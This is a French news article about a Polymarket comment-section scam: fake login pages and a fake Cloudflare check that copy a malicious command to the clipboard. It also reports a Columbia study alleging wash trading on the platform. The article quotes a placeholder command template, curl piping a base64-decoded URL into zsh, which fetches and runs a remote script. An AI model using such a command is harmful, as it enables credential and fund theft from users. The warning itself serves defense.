Polymarket fait de nouveau la une des journaux, cette fois-ci parce que l'un de ses traders les plus expérimentés, sous le pseudonyme de « 25usdc », a tiré la sonnette d'alarme concernant un système qui utilise la section commentaires de la plateforme pour piéger des utilisateurs sans méfiance.
Cela survient à un moment crucial pour la plateforme Polymarket, qui s'apprête à réintégrer le marché américain et peine à devancer ses concurrents comme Kalshi.
Les négociants de Polymarket sont en alerte maximale
Selon 25usdc , des pirates informatiques utilisent la section commentaires de Polymarket pour mener une escroquerie, et jusqu'à présent, les utilisateurs ont perdu plus de 500 000 $.
« Ils disent : "Pourquoi ne pas trader sur les marchés privés de Polymarket ? Les chances y sont toujours bien meilleures !" », a écrit 25usdc, avant d'expliquer le fonctionnement de toute cette arnaque.
D'après lui, tout commence par l'achat simultané d'actions « Oui » et « Non » sur un même marché, à partir de deux comptes distincts. Ainsi, leurs commentaires restent visibles même lorsque le filtre « Détenteurs » est activé. Ensuite, ils publient l'URL de leur site de manière cryptée.
L'URL redirige l'utilisateur non averti vers une page d'apparence soignée arborant le logo de Polymarket et lui demande de se connecter par e-mail. Une fois l'adresse e-mail vérifiée, une nouvelle fenêtre s'affiche, imitant CloudFlare, et invite l'utilisateur à confirmer son activité.
Cependant, 25usdc indique que lorsque vous cliquez sur « Copier », une commande ressemblant à « curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh » est copiée à la place et que la première chose qu'elle fait, si l'utilisateur commet l'erreur de la coller dans son terminal, est de décoder la chaîne encodée en base64 (une URL de serveur), après quoi elle récupère un script depuis ce serveur et l'exécute immédiatement.
Le script en question peut contenir n'importe quoi, et il n'y aura apparemment aucun avertissement contextuel, auquel cas le mal sera fait, et le seul remède selon 25usdc serait de désactiver le Wi-Fi.
« Au final, ils collectent des données, enregistrent tout sur votre système et renvoient un fichier zip à leur serveur », a écrit 25usdc. « Ils utilisent ensuite ces données pour accéder à vos comptes et voler votre argent. »
Il a également remarqué la prudence avec laquelle le groupe opère ; par exemple, ils effacent leurs traces en changeant souvent de portefeuille, ils brouillent les pistes à chaque étape et vont même jusqu'à fermer le serveur qui envoie les charges utiles et reçoit les données enregistrées lorsqu'il n'y a pas de victime active.
« Je pense que la meilleure façon de régler ce problème est de permettre aux utilisateurs de confiance de consulter les commentaires ou d'introduire un système de vote négatif qui masque les publications ayant reçu un grand nombre de votes négatifs », a conclu 25usdc, tout en soulignant que le simple avertissement affiché actuellement par Polymarket ne suffira pas.
Avertissement : Il n’existe aucun site web Polymarket de « marché privé » offrant de « meilleures chances »
N’entrez jamais votre adresse e-mail Polymarket ou votre code de vérification de connexion sur un autre site que notre site officiel.
— Polymarket Traders (@PolymarketTrade) 9 novembre 2025
Une nouvelle étude affirme que le volume d'échanges de Polymarket est artificiellement gonflé par des opérations fictives
En tant que Cryptopolitan Selon une étude récemment publiée par des chercheurs de l'Université Columbia, le volume d'activité sur Polymarket aurait été considérablement gonflé par des opérations fictives.
Le « trading artificiel », comme l'ont appelé les auteurs, a varié au fil du temps, mais ils affirment qu'il a représenté en moyenne 25 % de tous les achats et ventes sur Polymarket au cours des trois dernières années.
L'article n'a pas encore fait l'objet d'une évaluation par les pairs, mais il est déjà disponible sur la plateforme de recherche en libre accès SSRN et est en cours d'évaluation par Polymarket.
Pour être clair, les auteurs n'accusent pas ouvertement Polymarket de manipulation de marché. Ils ont toutefois mis en lumière des éléments de la structure de la plateforme, basée sur les cryptomonnaies, qui rendent cette accusation plausible.
Ils ont également suggéré que les clients de la société pourraient s'être livrésdentà ces opérations de trading fictif dans le but d'améliorer leurs chances d'obtenir un jeton numérique propriétaire dont le fondateur de la société, Shayne Coplan, a laissé entendre qu'il pourrait être lancé le 8 octobre dernier.
« J’espère que Polymarket accueillera favorablement l’analyse présentée dans notre article », a déclaré Yash Kanoria, professeur à la Columbia Business School et co-auteur de l’article, dans un courriel. « Les transactions fictives n’apportent ni liquidité ni information au marché ; il serait donc pertinent de distinguer les volumes authentiques des volumes fictifs. »
Si une partie du volume de Polymarket est réellement « fictive », l'étude affirme que cela pourrait modifier la compréhension de la force relative de Polymarket dans le secteur et également remettre en cause l'idée actuelle selon laquelle les marchés de prédiction reflètent la « sagesse d'une foule plus large »
« Le risque de manipulations de marché à grande échelle signifie que le volume peut ne pas être un indicateur fiable de l'activité réelle de la plateforme, en particulier sur les plateformes d'échange de cryptomonnaies qui peuvent ne pas disposer de mesures de protection adéquates », ont conclu les auteurs.
